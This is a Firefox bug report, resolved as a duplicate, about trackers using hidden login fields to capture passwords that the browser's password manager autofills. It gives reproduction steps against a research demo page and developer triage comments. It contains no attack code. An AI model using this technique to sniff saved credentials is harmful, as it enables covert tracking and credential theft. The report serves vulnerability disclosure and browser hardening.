1443083 - sniffing Passwords with hidden login fields/scripts

Status: RESOLVED DUPLICATE of bug 1427543

(Toolkit :: Password Manager, defect)

Description

[Christoph Suter]

User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0
Build ID: 20180206200532

Steps to reproduce:

Goto this site
https://senglehardt.com/demo/no_boundaries/loginmanager/

Crate fake email and password save it to firefox Passwordmanager and proceed. next site presents you the email and password you just typed. --> Security risk, possible to track, unicely identifies persons


Actual results:

It worked and my password was sniffed without me interacting with the site.


Expected results:

the 2nd page should not have been able to sniff my passwords automatically. The Browser should warn me about hidden Login Field/script and ask what to do login or block the script from sniffing.

Comment 1

[Gingerbread Man]

NI :dveditz, :dbaron because this sounds similar to bug 1440786.

Comment 2

[Daniel Veditz [:dveditz]]

This is different from "css keylogging" (which only affects sites using a common JS library that reflects field values back into the DOM, and is arguably a problem created by those libraries).

This is based on a report from December
https://freedom-to-tinker.com/2017/12/27/no-boundaries-for-user-identities-web-trackers-exploit-browser-login-managers/

We should have a bug on that somewhere but I couldn't find it. We have a setting that defeats this (added in bug 359675 but not the default). We've recently had meetings with the password manager team where this came up so I'm quite surprised I can't find the relevant bug.

Comment 3

[Gingerbread Man]

(In reply to Daniel Veditz [:dveditz] from comment #2)
> We should have a bug on that somewhere but I couldn't find it.

Ah, found it. Thank you.